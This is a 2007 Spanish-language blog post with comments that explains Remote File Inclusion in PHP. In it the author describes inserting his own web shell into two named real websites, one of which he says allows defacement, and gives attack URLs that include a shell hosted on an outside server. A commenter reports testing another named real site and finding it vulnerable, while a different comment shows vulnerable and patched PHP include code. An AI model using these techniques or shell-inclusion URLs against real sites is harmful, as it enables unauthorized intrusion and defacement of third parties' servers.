www.Newbie.cl

Tu marcas el limite

RFI o Remote File Inclusion

August 17th, 2007 by JDF

RFI (Remote File Inclusion) en español (Inclusion de Archivo remoto), es la tecnica que se aprovecha de una falla en la programacion de paginas web, mediante la cual podemos insertar archivos ingresando algunos parametros por la url, este fallo se logra cuando por algun motivo el webmaster o programador no cierra bien su pagina y sin darse cuenta el hecho que su URL llame a algun archivo y parametro con un simple php?=, php?c=, php?id=…………….etc, si se fijan con el Signo = se esta haciendo referencia a una web o algun archivo, es hay donde nos aprovechamos e insertamos nuestro archivo o sh3ll, si la pagina tiene fallos de RFI entraremos pero no al server ni al index directamente solo podremos ejecutar el archivo que direccionamos si hemos direccionado una SH3LL debemos cerrar la sentencia con un signo ? para que se ejecute en el server y no en nuestro pc,

un ejemplo

http:://web-victima.com/php?id=/mi-web-con-mi-shell?

Pero tampoco es cosa de subir una shell y soltarse a defacear o hacer cosas hay paginas que ya estan protegidas y te hacen un poco mas dicficil el ingreso miren les pongo un ejemplo

esta pagina

http://www2.koillismaa.fi/~juhan/preview.php?file= tiene fallo RFi y le inserte mi shell, pero si se fijan en la parte donde dice Safe mode On es decir con seguridad activa, (No inviolable pero si con seguridad activa)

Ahora si tenemos un poco de suerte nos podemos encontrar con algo asi

http://www.wpfutsal.com/index.php?page= Tiene falo RFi y le inserte mi shell ahora si se fijan donde dice SAFE MODE OFF es decir con la guardia baja y tengo permisos de escritura en muchos de los archivos, con esto puedo hacer un deface modificando el Index

Bueno pongo solo eso por ahora, espero que le aclare un poquito sobre el tema, recuerden que si quieren saber mas solo pregunten y posteamos mas cosas

Posted in Uncategorized |

7 Comments so far

  1. vlascon August 18th, 2007 12:54 pm

    :d Te pasaste wn!, faltaba eso viste :d espero que ahora si quede mas claro…. JAJAJA

    Saludos

  2. CPS 2.0 August 19th, 2007 5:00 pm

    Estos son ejemplos de programación PHP vulnerable a RFI y protegida:
    El ejemplo no funciona bajo apache protegido por mod_security

    // Para que funcione correctamente la shell se debe poner al final de esta el signo ?, así las variables que se incluyan posteriormente serán parte de ella y no del PHP de la victima

    // URL ejemplo: http://web-victima.com/php?page=http://mi-web.cl/mi_shell.php?

    // Código PHP vulnerable
    < ?PHP
    include($_GET['page']); //esto incluye directamente y sin filtros cualquier link que se especifique en “page”
    ?>

    // Código PHP protegido
    < ?PHP
    $url='./'.$_GET['page']; // o en nibel superior: $url='./paginas/'.$_GET['page'];
    include($url); //esto obliga a que "page" sea parte del dominio, de no encontrar el archivo devolverá un Warning como este:
    //Warning: include() [function.include]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/newbie/www/rfi.php on line 3
    // El problema cuando se ve este mensaje, es que indicas al atacante que la inclusión es a la página que le pones en la URL, además se ve una especie de error y no queremos que pase eso.
    ?>

    // Código PHP protegido sin mensajes
    < ?PHP
    $url='./'.$_GET['page']; // o en nibel superior: $url='./paginas/'.$_GET['page'];
    If(¡file($url)){
    $url='./pagina_por_defecto.php';
    }
    include($url); //no devolverá ningún warning y mostrara la información por defecto de nuestra página
    ?>

    Para mas información acerca de las funciones PHP, www.php.net

  3. MSWINSCK August 20th, 2007 11:30 pm

    UTA LAS WEA MAS WEAS TONTAS JEJEJJEAJEAJ
    SE HACEN LLAMAR HACKERS???????????????????????
    PAGINA DE PRINCIPIANES.

  4. vlascon August 21st, 2007 4:12 pm

    MSWINSCK, como te conteste en el post anterior http://www.newbie.cl/nb/2007/08/18/tecnicas-de-sql-injection/#comment-185 Nadie dice que somos Hacker….

    De nuevo Gracias por visitarnos.

  5. CPS 2.0 August 21st, 2007 4:19 pm

    Estimado MSWINSCK:

    Nuestra pagina web se llama Newbie.cl y no Hacker.cl

    Para mas informacion acerca de estas definiciones puedes visitar http://www.newbie.cl/nb/2007/06/21/hacker-white-hat-entre-otros/

    Salu2

  6. GR December 6th, 2007 12:36 pm

    Amigo,

    Una de las formas de probar RFI es intentando colocar http://web-victima.com/php?page=http://www.google.com y si aparece la página de Google dentro del site te indica que es vulnerable. Lo mismo aplica para cuando tenemos casos como http://web-victima.com/id=http://www.google.com?… ¿Cómo evalúo un site a ver si es vulnerable?, puedes poner ejemplos posibles

  7. vlascon December 28th, 2007 1:52 pm

    mmm… ejemplo real… ufff… complicado :D

    La verdad no se si corresponda pero bueno… el otro dia googleando… encontre este sitio

    http://www.smartel.cl/home.php?nombre_pagina=enlaces.html

    y me llamo la atencion que estaba llamando un archivo .html lo cual lo primero que hice fue probar una ruta externa:

    http://www.smartel.cl/home.php?nombre_pagina=http://www.newbie.cl/index.html

    Sorpresa :| Funiona!… bueno eso…

    54lud05

Leave a reply